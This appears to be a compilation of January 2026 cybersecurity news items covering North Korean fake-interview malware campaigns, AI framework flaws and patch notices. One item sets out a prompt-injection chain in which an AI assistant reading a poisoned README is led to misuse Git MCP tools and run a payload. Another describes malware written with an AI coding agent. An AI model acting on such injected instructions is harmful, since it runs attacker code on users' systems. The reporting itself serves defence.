2026-01-22 AI创业新闻
North Korean PurpleBravo Campaign Targeted 3,136 IP Addresses via Fake Job Interviews
As many as 3,136 individual IP addresses linked to likely targets of the Contagious Interview activity have been identified, with the campaign claiming 20 potential victim organizations spanning artificial intelligence (AI), cryptocurrency, financial services, IT services, marketing, and software development sectors in Europe, South Asia, the Middle East, and Central America. The new findings come from Recorded Future’s Insikt Group, which is tracking the North Korean threat activity cluster under the moniker PurpleBravo . First documented in late 2023, the campaign is also known as CL-STA-0240, DeceptiveDevelopment, DEV#POPPER, Famous Chollima, Gwisin Gang, Tenacious Pungsan, UNC5342, Void Dokkaebi, and WaterPlum. The 3,136 individual IP addresses, primarily concentrated around South Asia and North America, are assessed to have been targeted by the adversary from August 2024 to September 2025.
The 20 victim companies are said to be based in Belgium, Bulgaria, Costa Rica, India, Italy, the Netherlands, Pakistan, Romania, the United Arab Emirates (U.A.E.), and Vietnam. “In several cases, it is likely that job-seeking candidates executed malicious code on corporate devices, creating organizational exposure beyond the individual target,” the threat intelligence firm said in a new report shared with The Hacker News. The disclosure comes a day after Jamf Threat Labs detailed a significant iteration of the Contagious Interview campaign wherein the attackers abuse malicious Microsoft Visual Studio Code (VS Code) projects as an attack vector to distribute a backdoor, underscoring continued exploitation of trusted developer workflows to achieve their twin goals of cyber espionage and financial theft. The Mastercard-owned company said it detected four LinkedIn personas potentially associated with PurpleBravo that masqueraded as developers and recruiters and claimed to be from the Ukrainian city of Odesa, along with several malicious GitHub repositories that are designed to deliver known malware families like BeaverTail.
PurpleBravo has also been observed managing two distinct sets of command-and-control (C2) servers for BeaverTail, a JavaScript infostealer and loader, and a Go-based backdoor known as GolangGhost (aka FlexibleFerret or WeaselStore) that is based on the HackBrowserData open-source tool. The C2 servers, hosted across 17 different providers, are administered via Astrill VPN and from IP ranges in China. North Korean threat actors’ use of Astrill VPN in cyber attacks has been well-documented over the years. It’s worth pointing out that Contagious Interview complements a second, separate campaign referred to as Wagemole (aka PurpleDelta), where IT workers from the Hermit Kingdom actors seek unauthorized employment under fraudulent or stolen identities with organizations based in the U.S.
and other parts of the world for both financial gain and espionage. While the two clusters are treated as disparate sets of activities, there are significant tactical and infrastructure overlaps between them despite the fact that the IT worker threat has been ongoing since 2017. “This includes a likely PurpleBravo operator displaying activity consistent with North Korean IT worker behavior, IP addresses in Russia linked to North Korean IT workers communicating with PurpleBravo C2 servers, and administration traffic from the same Astrill VPN IP address associated with PurpleDelta activity,” Recorded Future said. To make matters worse, candidates who are approached by PurpleBravo with fictitious job offers have been found to take the coding assessment on company-issued devices, effectively compromising their employers in the process.
This highlights that the IT software supply chain is “just as vulnerable” to infiltration from North Korean adversaries other than the IT workers. “Many of these [potential victim] organizations advertise large customer bases, presenting an acute supply-chain risk to companies outsourcing work in these regions,” the company noted. “While the North Korean IT worker employment threat has been widely publicized, the PurpleBravo supply-chain risk deserves equal attention so organizations can prepare, defend, and prevent sensitive data leakage to North Korean threat actors.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Zoom and GitLab Release Security Updates Fixing RCE, DoS, and 2FA Bypass Flaws
Zoom and GitLab have released security updates to resolve a number of security vulnerabilities that could result in denial-of-service (DoS) and remote code execution. The most severe of the lot is a critical security flaw impacting Zoom Node Multimedia Routers (MMRs) that could permit a meeting participant to conduct remote code execution attacks. The vulnerability, tracked as CVE-2026-22844 and discovered internally by its Offensive Security team, carries a CVSS score of 9.9 out of 10.0. “A command injection vulnerability in Zoom Node Multimedia Routers (MMRs) before version 5.2.1716.0 may allow a meeting participant to conduct remote code execution of the MMR via network access,” the company noted in a Tuesday alert.
Zoom is recommending that customers using Zoom Node Meetings, Hybrid, or Meeting Connector deployments update to the latest available MMR version to safeguard against any potential threat. There is no evidence that the security flaw has been exploited in the wild. The vulnerability affects the following versions - Zoom Node Meetings Hybrid (ZMH) MMR module versions prior to 5.2.1716.0 Zoom Node Meeting Connector (MC) MMR module versions prior to 5.2.1716.0 GitLab Releases Patches for Severe Flaws The disclosure comes as GitLab released fixes for multiple high-severity flaws affecting its Community Edition (CE) and Enterprise Edition (EE) that could result in DoS and a bypass of two-factor authentication (2FA) protections. The shortcomings are listed below - CVE-2025-13927 (CVSS score: 7.5) - A vulnerability that could allow an unauthenticated user to create a DoS condition by sending crafted requests with malformed authentication data (Affects all versions from 11.9 before 18.6.4, 18.7 before 18.7.2, and 18.8 before 18.8.2) CVE-2025-13928 (CVSS score: 7.5) - An incorrect authorization vulnerability in the Releases API that could allow an unauthenticated user to cause a DoS condition (Affects all versions from 17.7 before 18.6.4, 18.7 before 18.7.2, and 18.8 before 18.8.2) CVE-2026-0723 (CVSS score: 7.4) - A vulnerability that could allow an individual with existing knowledge of a victim’s credential ID to bypass 2FA by submitting forged device responses (Affects all versions from 18.6 before 18.6.4, 18.7 before 18.7.2, and 18.8 before 18.8.2 ) Also remediated by GitLab are two other medium-severity bugs that could also trigger a DoS condition (CVE-2025-13335, CVSS score: 6.5, and CVE-2026-1102, CVSS score: 5.3) by configuring malformed Wiki documents that bypass cycle detection and sending repeated malformed SSH authentication requests, respectively.
Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Webinar: How Smart MSSPs Using AI to Boost Margins with Half the Staff
Every managed security provider is chasing the same problem in 2026 — too many alerts, too few analysts, and clients demanding “CISO-level protection” at SMB budgets. The truth? Most MSSPs are running harder, not smarter. And it’s breaking their margins.
That’s where the quiet revolution is happening: AI isn’t just writing reports or surfacing risks — it’s rebuilding how security services are delivered . The Shift Until now, MSSPs scaled by adding people. Each new client meant another analyst, another spreadsheet, another late-night ticket queue. AI automation flips that model.
It handles assessments, benchmarking, and reporting in minutes — freeing your team to focus on strategy, not data entry. Early adopters are already seeing double-digit margin gains and faster onboarding cycles — without increasing headcount. Real Proof — Not Theory When Chad Robinson , CISO at Secure Cyber Defense, applied Cynomi’s AI platform, his team stopped drowning in manual checklists. He didn’t just automate reports; he turned junior analysts into “virtual CISOs,” expanding coverage and growing revenue from advisory services — all by standardizing delivery through AI.
Secure your spot for the live session ➜ What You’ll Learn In this session, Cynomi CEO David Primor and Chad Robinson unpack the real operating blueprint: How AI eliminates the grunt work that eats profit How to tier and package cybersecurity services for steady MRR What actually moved the needle for a growing MSSP — and how you can copy it How AI enables consistent, CISO-grade service at scale If you’re still hiring your way out of the workload crisis, you’re already behind. The MSSPs winning 2026 aren’t bigger — they’re smarter . Join the live session to see how AI can scale your security business without scaling your payroll. Register for the Webinar ➜ Found this article interesting?
This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Exposure Assessment Platforms Signal a Shift in Focus
Gartner® doesn’t create new categories lightly. Generally speaking, a new acronym only emerges when the industry’s collective “to-do list” has become mathematically impossible to complete. And so it seems that the introduction of the Exposure Assessment Platforms (EAP) category is a formal admission that traditional Vulnerability Management (VM) is no longer a viable way to secure a modern enterprise. The shift from the traditional Market Guide for Vulnerability Assessment to the new Magic Quadrant for EAPs represents a move away from the “vulnerability hose”, i.e., the endless stream of CVEs, and toward a model of Continuous Threat Exposure Management (CTEM) .
To us, this is more than just a change in terminology; it is an attempt to solve the “Dead End” paradox that has plagued security teams for a decade. In the inaugural Magic Quadrant report of this category, Gartner evaluated 20 vendors for their ability to support continuous discovery, risk-informed prioritization, and integrated visibility across cloud, on-prem, and identity layers. In this article, we’ll take a deep dive into the key findings of the report, the drivers behind the new category, the features that define it, and what we see as the takeaways for security teams. Why Exposure Assessment Is Gaining Ground Security tools have always promised risk reduction, but they’ve mostly delivered noise.
One product would reveal a misconfiguration. Another would log a privilege drift. A third would flag vulnerable external-facing assets. The result is a crisis of volume that has led to chronic alert fatigue in the SOC.
Each tool provided a piece of the puzzle, yet none were able to put all the pieces together and explain how exposure forms…or what to fix first to avoid it. The skepticism toward legacy VM tools is well-earned. Data from over 15,000 environments shows that 74% of identified exposures are “dead ends”, existing on assets that have no viable path to a critical system. In the old model, a security team might spend 90% of its remediation effort fixing these dead ends, yielding effectively zero reduction in risk to business processes.
This is what EAPs are designed to address. They pull all those pieces into a unified view that tracks how systems, identities, and vulnerabilities interact in real environments and show how an attacker could actually use it to move from a low-risk dev environment to critical assets. This model is gaining traction because it reflects how attackers operate. Threat actors don’t limit themselves to a single flaw.
They have weak controls, misaligned privileges, and blind spots in detection. The EAP model tracks how exposures accumulate across environments and lead attackers to reachable assets. Platforms in this category are built to show where risk originates, how it spreads, and which conditions support attacker movement. Gartner projects that organizations using this approach will reduce unplanned downtime by 30% by 2027 .
That kind of dramatic outcome is based on an equally dramatic change in how exposure is defined, modeled, and operationalized across environments. The shift touches every layer of the security workflow - from how signals are connected to how teams decide what to fix first. Drill Down: From Static Lists to Exposure in Motion That shift in workflow begins with how EAPs detect and connect the conditions that lead to risk. Exposure assessment platforms take a different approach than traditional vulnerability tools.
They’re built around a distinct set of capabilities: They consolidate discovery across environments. EAPs continuously scan internal networks, cloud workloads, and user-facing systems to identify both known and untracked assets, alongside unmanaged identities, misconfigured roles, and legacy systems that may not appear in standard inventories. They prioritize based on context, not just severity. Exposure is ranked using multiple parameters - asset importance, access paths, exploitability, and control coverage.
This allows teams to see which issues are reachable, which are isolated, and which enable lateral movement. They integrate exposure data into operational workflows. EAP output is designed to support action. Platforms connect with IT and security tools so findings can be assigned, tracked, and resolved through existing systems - without waiting for a quarterly audit or manual review.
They support lifecycle tracking. Once exposures are identified, EAPs monitor them across remediation steps, configuration changes, and policy updates. That visibility helps teams understand what’s been fixed, what remains, and how each adjustment affects risk posture. What the Quadrant Reveals About Market Maturity The new Magic Quadrant highlights a split in the market.
On one side, you have legacy incumbents attempting to “bolt on” exposure features to their existing scanning engines. On the other, you have native Exposure Management players who have been modeling attacker behavior for years. The maturity of the category is evidenced by a shift in the “definition of done.” Success is no longer measured by how many vulnerabilities were patched, but by how many critical attack paths were eliminated. Platforms like XM Cyber, which were built on attack graph-based modeling, are now leading the way for this approach.
What Security Teams Should Be Watching Exposure assessment now stands as its own category, with defined capabilities, evaluation criteria, and a growing role in enterprise workflows. The platforms in the Magic Quadrant are identifying connected exposures, mapping which assets can be reached, and guiding remediation based on attacker movement. For the practitioner, the immediate value is efficiency. These platforms are making decisions about what to fix first, how to assign ownership, and where risk reduction will have the most impact.
Exposure assessment is now positioned as a core layer in how environments are secured, maintained, and understood. If you can mathematically prove that 74% of your alerts can be safely ignored, you aren’t just “improving security” – you’re returning time and resources to a team that is likely already at its breaking point. The EAP category is finally aligning security metrics with business reality. The question is no longer “How many vulnerabilities do we have?” but “Are we safe from the attack paths that matter?” To learn more about why XM Cyber was named a challenger in the 2025 Magic Quadrant for exposure assessment platforms, grab your copy of the report here .
Note : This article was expertly written and contributed by Maya Malevich, Head of Product Marketing at XM Cyber. Gartner Disclaimer: Gartner, Magic Quadrant for Exposure Assessment Platforms, By Mitchell Schneider, Dhivya Poole, and Jonathan Nunez, November 10, 2025. GARTNER is a registered trademark and service mark of Gartner, and Magic Quadrant is a registered trademark of Gartner, Inc. and/or its affiliates in the U.S.
and internationally, and are used herein with permission. All rights reserved. Gartner does not endorse any vendor, product, or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact.
Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose. Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Chainlit AI Framework Flaws Enable Data Theft via File Read and SSRF Bugs
Security vulnerabilities were uncovered in the popular open-source artificial intelligence (AI) framework Chainlit that could allow attackers to steal sensitive data, which may allow for lateral movement within a susceptible organization. Zafran Security said the high-severity flaws, collectively dubbed ChainLeak , could be abused to leak cloud environment API keys and steal sensitive files, or perform server-side request forgery (SSRF) attacks against servers hosting AI applications. Chainlit is a framework for creating conversational chatbots. According to statistics shared by the Python Software Foundation, the package has been downloaded over 220,000 times over the past week.
It has attracted a total of 7.3 million downloads to date. Details of the two vulnerabilities are as follows - CVE-2026-22218 (CVSS score: 7.1) - An arbitrary file read vulnerability in the “/project/element” update flow that allows an authenticated attacker to access the contents of any file readable by the service into their own session due to a lack of validation of user-controller fields CVE-2026-22219 (CVSS score: 8.3) - An SSRF vulnerability in the “/project/element” update flow when configured with the SQLAlchemy data layer backend that allows an attacker to make arbitrary HTTP requests to internal network services or cloud metadata endpoints from the Chainlit server and store the retrieved responses “The two Chainlit vulnerabilities can be combined in multiple ways to leak sensitive data, escalate privileges, and move laterally within the system,” Zafran researchers Gal Zaban and Ido Shani said. “Once an attacker gains arbitrary file read access on the server, the AI application’s security quickly begins to collapse. What initially appears to be a contained flaw becomes direct access to the system’s most sensitive secrets and internal state.” For instance, an attacker can weaponize CVE-2026-22218 to read “/proc/self/environ,” allowing them to glean valuable information such as API keys, credentials, and internal file paths that could be used to burrow deeper into the compromised network and even gain access to the application source code.
Alternatively, it can be used to leak database files if the setup uses SQLAlchemy with an SQLite backend as its data layer. What’s more, if Chainlit is deployed on an Amazon Web Services (AWS) EC2 instance with IMDSv1 enabled, the SSRF vulnerability can be abused to access the link-local address (169.254.169[.]254) and retrieve role endpoints, enabling opportunities for lateral movement within the cloud environment. Following responsible disclosure on November 23, 2025, both vulnerabilities were addressed by Chainlit in version 2.9.4 released on December 24, 2025. “As organizations rapidly adopt AI frameworks and third-party components, long-standing classes of software vulnerabilities are being embedded directly into AI infrastructure,” Zafran said.
“These frameworks introduce new and often poorly understood attack surfaces, where well-known vulnerability classes can directly compromise AI-powered systems.” Flaw in Microsoft MarkItDown MCP Server The disclosure comes as BlueRock disclosed a similar SSRF vulnerability in Microsoft’s MarkItDown Model Context Protocol (MCP) server dubbed MCP fURI that enables arbitrary calling of URI resources, exposing organizations to privilege escalation, SSRF, and data leakage attacks. The shortcoming affects the server when running in an Amazon Web Services (AWS) EC2 instance using IDMSv1 . “This vulnerability allows an attacker to execute the Markitdown MCP tool convert_to_markdown to call an arbitrary uniform resource identifier (URI),” BlueRock said . “The lack of any boundaries on the URI allows any user, agent, or attacker calling the tool to access any HTTP or file resource.” “When providing a URI to the Markitdown MCP server, this can be used to query the instance metadata of the server.
A user can then obtain credentials to the instance if there is a role associated, giving you access to the AWS account, including the access and secret keys.” The agentic AI security company said its analysis of more than 7,000 MCP servers found that over 36.7% of them are likely exposed to similar SSRF vulnerabilities. To mitigate the risk posed by the issue, it’s advised to use IMDSv2 to secure against SSRF attacks, implement private IP blocking, restrict access to metadata services, and create an allowlist to prevent data exfiltration. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Most AI Risk Isn’t in Models, It’s in Your SaaS Stack
VoidLink Linux Malware Framework Built with AI Assistance Reaches 88,000 Lines of Code
The recently discovered sophisticated Linux malware framework known as VoidLink is assessed to have been developed by a single person with assistance from an artificial intelligence (AI) model. That’s according to new findings from Check Point Research, which identified operational security blunders by malware’s author that provided clues to its developmental origins. The latest insight makes VoidLink one of the first instances of an advanced malware largely generated using AI. “These materials provide clear evidence that the malware was produced predominantly through AI-driven development, reaching a first functional implant in under a week,” the cybersecurity company said, adding it reached more than 88,000 lines of code by early December 2025.
VoidLink, first publicly documented last week, is a feature-rich malware framework written in Zig that’s specifically designed for long-term, stealthy access to Linux-based cloud environments. The malware is said to have come from a Chinese-affiliated development environment. As of writing, the exact purpose of the malware remains unclear. No real-world infections have been observed to date.
A follow-up analysis from Sysdig was the first to highlight the fact that the toolkit may have been developed with the help of a large language model (LLM) under the directions of a human with extensive kernel development knowledge and red team experience, citing four different pieces of evidence - Overly systematic debug output with perfectly consistent formatting across all modules Placeholder data (“John Doe”) is typical of LLM training examples embedded in decoy response templates Uniform API versioning where everything is _v3 (e.g., BeaconAPI_v3, docker_escape_v3, timestomp_v3) Template-like JSON responses covering every possible field “The most likely scenario: a skilled Chinese-speaking developer used AI to accelerate development (generating boilerplate, debug logging, JSON templates) while providing the security expertise and architecture themselves,” the cloud security vendor noted late last week. Check Point’s Tuesday report backs up this hypothesis, stating it identified artifacts suggesting that the development in itself was engineered using an AI model, which was then used to build, execute, and test the framework – effectively turning what was a concept into a working tool within an accelerated timeline. High-level overview of the VoidLink Project “The general approach to developing VoidLink can be described as Spec Driven Development (SDD),” it noted. “In this workflow, a developer begins by specifying what they’re building, then creates a plan, breaks that plan into tasks, and only then allows an agent to implement it.” It’s believed that the threat actor commenced work on the VoidLink in late November 2025, leveraging a coding agent known as TRAE SOLO to carry out the tasks.
This assessment is based on the presence of TRAE-generated helper files that have been copied along with the source code to the threat actor’s server and later leaked in an exposed open directory. In addition, Check Point said it uncovered internal planning material written in Chinese related to sprint schedules, feature breakdowns, and coding guidelines that have all the hallmarks of LLM-generated content – well-structured, consistently formatted, and meticulously detailed. One such document detailing the development plan was created on November 27, 2025. The documentation is said to have been repurposed as an execution blueprint for the LLM to follow, build, and test the malware.
Check Point, which replicated the implementation workflow using the TRAE IDE used by the developer, found that the model generated code that resembled VoidLink’s source code. Translated development plan for three teams: Core, Arsenal, and Backend “A review of the code standardization instructions against the recovered VoidLink source code shows a striking level of alignment,” it said. “Conventions, structure, and implementation patterns match so closely that it leaves little room for doubt: the codebase was written to those exact instructions.” The development is yet another sign that, while AI and LLMs may not equip bad actors with novel capabilities, they can further lower the barrier of entry to cybercrime, empowering even a single individual to envision, create, and iterate complex systems quickly and pull off sophisticated attacks – streamlining what was once a process that required a significant amount of effort and resources and available only to nation-state adversaries. “VoidLink represents a real shift in how advanced malware can be created.
What stood out wasn’t just the sophistication of the framework, but the speed at which it was built,” Eli Smadja, group manager at Check Point Research, said in a statement shared with The Hacker News. “AI enabled what appears to be a single actor to plan, develop, and iterate a complex malware platform in days – something that previously required coordinated teams and significant resources. This is a clear signal that AI is changing the economics and scale of cyber threats.” In a whitepaper published this week, Group-IB described AI as supercharging a “fifth wave” in the evolution of cybercrime, offering ready-made tools to enable sophisticated attacks. “Adversaries are industrialising AI, turning once specialist skills such as persuasion, impersonation, and malware development into on-demand services available to anyone with a credit card,” it said.
The Singapore-headquartered cybersecurity company noted that dark web forum posts featuring AI keywords have seen a 371% increase since 2019, with threat actors advertising dark LLMs like Nytheon AI that do not have any ethical restrictions, jailbreak frameworks, and synthetic identity kits offering AI video actors, cloned voices, and even biometric datasets for as little as $5. “AI has industrialized cybercrime. What once required skilled operators and time can now be bought, automated, and scaled globally,” Craig Jones, former INTERPOL director of cybercrime and independent strategic advisor, said. “While AI hasn’t created new motives for cybercriminals — money, leverage, and access still drive the ecosystem – it has dramatically increased the speed, scale, and sophistication with which those motives are pursued.” Found this article interesting?
Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
LastPass Warns of Fake Maintenance Messages Targeting Users’ Master Passwords
LastPass is alerting users to a new active phishing campaign that’s impersonating the password management service, which aims to trick users into giving up their master passwords. The campaign, which began on or around January 19, 2026, involves sending phishing emails claiming upcoming maintenance and urging them to create a local backup of their password vaults in the next 24 hours. The messages, LastPass said, come with the following subject lines - LastPass Infrastructure Update: Secure Your Vault Now Your Data, Your Protection: Create a Backup Before Maintenance Don’t Miss Out: Backup Your Vault Before Maintenance Important: LastPass Maintenance & Your Vault Security Protect Your Passwords: Backup Your Vault (24-Hour Window) The emails are designed to steer unsuspecting users to a phishing site (“group-content-gen2.s3.eu-west-3.amazonaws[.]com/5yaVgx51ZzGf”) that then redirects to the domain “ mail-lastpass[.]com .” The company emphasized that it will never ask users for their master passwords and that it’s working with third-party partners to take the malicious infrastructure down. It has also shared the email addresses from which the messages originate - support@sr22vegas[.]com support@lastpass[.]server8 support@lastpass[.]server7 support@lastpass[.]server3 “This campaign is designed to create a false sense of urgency, which is one of the most common and effective tactics we see in phishing attacks, a spokesperson for the Threat Intelligence, Mitigation, and Escalation (TIME) team at LastPass told The Hacker News in a statement.
“We want customers and the broader security community to be aware that LastPass will never ask for their master password or demand immediate action under a tight deadline. We thank our customers for staying vigilant and continuing to report suspicious activity.” The development comes months after LastPass cautioned users of an information-stealing campaign targeting Apple macOS users through fake GitHub repositories that distribute malware-laced programs masquerading as the password manager and other popular software. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
CERT/CC Warns binary-parser Bug Allows Node.js Privilege-Level Code Execution
A security vulnerability has been disclosed in the popular binary-parser npm library that, if successfully exploited, could result in the execution of arbitrary JavaScript. The vulnerability, tracked as CVE-2026-1245 (CVSS score: N/A), affects all versions of the module prior to version 2.3.0 , which addresses the issue. Patches for the flaw were released on November 26, 2025. Binary-parser is a widely used parser builder for JavaScript that allows developers to parse binary data.
It supports a wide range of common data types, including integers, floating-point values, strings, and arrays. The package attracts approximately 13,000 downloads on a weekly basis. According to an advisory released by the CERT Coordination Center (CERT/CC), the vulnerability has to do with a lack of sanitization of user-supplied values, such as parser field names and encoding parameters, when the JavaScript parser code is dynamically generated at runtime using the “Function” constructor. It’s worth noting that the npm library builds JavaScript source code as a string that represents the parsing logic and compiles it using the Function constructor and caches it as an executable function to parse buffers efficiently.
However, as a result of CVE-2026-1245, an attacker-controlled input could make its way to the generated code without adequate validation, causing the application to parse untrusted data, resulting in the execution of arbitrary code. Applications that use only static, hard-coded parser definitions are not affected by the flaw. “In affected applications that construct parser definitions using untrusted input, an attacker may be able to execute arbitrary JavaScript code with the privileges of the Node.js process,” CERT/CC said. “This could allow access to local data, manipulation of application logic, or execution of system commands depending on the deployment environment.” Security researcher Maor Caplan has been credited with discovering and reporting the vulnerability.
Users of binary-parser are advised to upgrade to version 2.3.0 and avoid passing user-controlled values into parser field names or encoding parameters. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
North Korea-Linked Hackers Target Developers via Malicious VS Code Projects
The North Korean threat actors associated with the long-running Contagious Interview campaign have been observed using malicious Microsoft Visual Studio Code (VS Code) projects as lures to deliver a backdoor on compromised endpoints. The latest finding demonstrates continued evolution of the new tactic that was first discovered in December 2025, Jamf Threat Labs said. “This activity involved the deployment of a backdoor implant that provides remote code execution capabilities on the victim system,” security researcher Thijs Xhaflaire said in a report shared with The Hacker News. First disclosed by OpenSourceMalware last month, the attack essentially involves instructing prospective targets to clone a repository on GitHub, GitLab, or Bitbucket, and launch the project in VS Code as part of a supposed job assessment.
The end goal of these efforts is to abuse VS Code task configuration files to execute malicious payloads staged on Vercel domains, depending on the operating system on the infected host. The task is configured such that it runs every time that file or any other file in the project folder is opened in VS Code by setting the “runOn: folderOpen” option. This ultimately leads to the deployment of BeaverTail and InvisibleFerret. Contagious Interview Using VS Code Tasks Subsequent iterations of the campaign have been found to conceal sophisticated multi-stage droppers in task configuration files by disguising the malware as harmless spell-check dictionaries as a fallback mechanism in the event the task is unable to retrieve the payload from the Vercel domain.
Like before, the obfuscated JavaScript embedded with these files is executed as soon as the victim opens the project in the integrated development environment (IDE). It establishes communication with a remote server (“ip-regions-check.vercel[.]app”) and executes any JavaScript code received from it. The final stage delivered as part of the attack is another heavily obfuscated JavaScript. Jamf said it discovered yet another change in this campaign, with the threat actors using a previously undocumented infection method to deliver a backdoor that offers remote code execution capabilities on the compromised host.
The starting point of the attack chain is no different in that it’s activated when the victim clones and opens a malicious Git repository using VS Code. “When the project is opened, Visual Studio Code prompts the user to trust the repository author,” Xhaflaire explained. “If that trust is granted, the application automatically processes the repository’s tasks.json configuration file, which can result in embedded arbitrary commands being executed on the system.” Using a seemingly harmless dictionary file as a backup option (Source: OpenSourceMalware) “On macOS systems, this results in the execution of a background shell command that uses nohup bash -c in combination with curl -s to retrieve a JavaScript payload remotely and pipe it directly into the Node.js runtime. This allows execution to continue independently if the Visual Studio Code process is terminated, while suppressing all command output.” The JavaScript payload, hosted on Vercel, contains the main backdoor logic to establish a persistent execution loop that harvests basic host information and communicates with a remote server to facilitate remote code execution, system fingerprinting, and continuous communication.
In one case, the Apple device management firm said it observed more JavaScript instructions being executed roughly eight minutes after the initial infection. The newly downloaded JavaScript is designed to beacon to the server every five seconds, run additional JavaScript, and erase traces of its activity upon receiving a signal from the operator. It’s suspected that the script may have been generated using an artificial intelligence (AI) tool owing to the presence of inline comments and phrasing in the source code. Threat actors with ties to the Democratic People’s Republic of Korea (DPRK) are known to specifically go after software engineers, particular those working in cryptocurrency, blockchain, and fintech sectors, as they often tend to have privileged access to financial assets, digital wallets, and technical infrastructure.
Compromising their accounts and systems could allow the attackers unauthorized access to source code, intellectual property, internal systems, and siphon digital assets. These consistent changes to their tactics are seen as an effort to achieve more success in their cyber espionage and financial goals to support the heavily-sanctioned regime. The development comes as Red Asgard detailed its investigation into a malicious repository that has been found to use a VS Code task configuration to fetch obfuscated JavaScript designed to drop a full-featured backdoor named Tsunami (aka TsunamiKit) along with an XMRig cryptocurrency miner. Another analysis from Security Alliance last week has also laid out the campaign’s abuse of VS Code tasks in an attack where an unspecified victim was approached on LinkedIn, with the threat actors claiming to be the chief technology officer of a project called Meta2140 and sharing a Notion[.]so link that contains a technical assessment and a URL to a Bitbucket repository hosting the malicious code.
Interestingly, the attack chain is engineered to fallback to two other methods: installing a malicious npm dependency named “ grayavatar “ or running JavaScript code that’s responsible for retrieving a sophisticated Node.js controller, which, in turn, runs five distinct modules to log keystrokes, take screenshots, scans the system’s home directory for sensitive files, substitute wallet addresses copied to the clipboard, credentials from web browsers, and establish a persistent connection to a remote server. The malware then proceeds to set up a parallel Python environment using a stager script that enables data collection, cryptocurrency mining using XMRig, keylogging, and the deployment of AnyDesk for remote access. It’s worth noting that the Node.js and Python layers are referred to as BeaverTail and InvisibleFerret, respectively. These findings indicate that the state-sponsored actors are experimenting with multiple delivery methods in tandem to increase the likelihood of success of their attacks.
“While monitoring, we’ve seen the malware that is being delivered change very quickly over a short amount of time,” Jaron Bradley, director of Jamf Threat Labs, told The Hacker News. “It’s worth noting that the payload we observed for macOS was written purely in JavaScript and had many signs of being AI assisted. It’s difficult to know exactly how quickly attackers are changing their workflows, but this particular threat actor has a reputation for adapting quickly.” To counter the threat, developers are advised to exercise caution when interacting with third-party repositories, mainly those originating from unfamiliar sources or shared directly during coding tests; review source code contents before opening them in VS Code; install only vetted npm packages. “This activity highlights the continued evolution of DPRK-linked threat actors, who consistently adapt their tooling and delivery mechanisms to integrate with legitimate developer workflows,” Jamf said.
“The abuse of Visual Studio Code task configuration files and Node.js execution demonstrates how these techniques continue to evolve alongside commonly used development tools.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Three Flaws in Anthropic MCP Git Server Enable File Access and Code Execution
A set of three security vulnerabilities has been disclosed in mcp-server-git , the official Git Model Context Protocol ( MCP ) server maintained by Anthropic, that could be exploited to read or delete arbitrary files and execute code under certain conditions. “These flaws can be exploited through prompt injection, meaning an attacker who can influence what an AI assistant reads (a malicious README, a poisoned issue description, a compromised webpage) can weaponize these vulnerabilities without any direct access to the victim’s system,” Cyata researcher Yarden Porat said in a report shared with The Hacker News. Mcp-server-git is a Python package and an MCP server that provides a set of built-in tools to read, search, and manipulate Git repositories programmatically via large language models (LLMs). The security issues, which have been addressed in versions 2025.9.25 and 2025.12.18 following responsible disclosure in June 2025, are listed below - CVE-2025-68143 (CVSS score: 8.8 [v3] / 6.5 [v4]) - A path traversal vulnerability arising as a result of the git_init tool accepting arbitrary file system paths during repository creation without validation (Fixed in version 2025.9.25) CVE-2025-68144 (CVSS score: 8.1 [v3] / 6.4 [v4]) - An argument injection vulnerability arising as a result of git_diff and git_checkout functions passing user-controlled arguments directly to git CLI commands without sanitization (Fixed in version 2025.12.18) CVE-2025-68145 (CVSS score: 7.1 [v3] / 6.3 [v4]) - A path traversal vulnerability arising as a result of a missing path validation when using the –repository flag to limit operations to a specific repository path (Fixed in version 2025.12.18) Successful exploitation of the above vulnerabilities could allow an attacker to turn any directory on the system into a Git repository, overwrite any file with an empty diff, and access any repository on the server.
In an attack scenario documented by Cyata, the three vulnerabilities could be chained with the Filesystem MCP server to write to a “.git/config” file (typically located within the hidden .git directory) and achieve remote code execution by triggering a call to git_init by means of a prompt injection. Use git_init to create a repo in a writable directory Use the Filesystem MCP server to write a malicious .git/config with a clean filter Write a .gitattributes file to apply the filter to certain files Write a shell script with the payload Write a file that triggers the filter Call git_add, which executes the clean filter, running the payload In response to the findings, the git_init tool has been removed from the package and adds extra validation to prevent path traversal primitives. Users of the Python package are recommended to update to the latest version for optimal protection. “This is the canonical Git MCP server, the one developers are expected to copy,” Shahar Tal, CEO and co-founder of Agentic AI security company Cyata, said.
“If security boundaries break down even in the reference implementation, it’s a signal that the entire MCP ecosystem needs deeper scrutiny. These are not edge cases or exotic configurations, they work out of the box.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Hackers Use LinkedIn Messages to Spread RAT Malware Through DLL Sideloading
Cybersecurity researchers have uncovered a new phishing campaign that exploits social media private messages to propagate malicious payloads, likely with the intent to deploy a remote access trojan (RAT). The activity delivers “weaponized files via Dynamic Link Library (DLL) sideloading, combined with a legitimate, open-source Python pen-testing script,” ReliaQuest said in a report shared with The Hacker News. The attack involves approaching high-value individuals through messages sent on LinkedIn, establishing trust, and deceiving them into downloading a malicious WinRAR self-extracting archive (SFX). Once launched, the archive extracts four different components - A legitimate open-source PDF reader application A malicious DLL that’s sideloaded by the PDF reader A portable executable (PE) of the Python interpreter A RAR file that likely serves as a decoy The infection chain gets activated when the PDF reader application is run, causing the rogue DLL to be sideloaded.
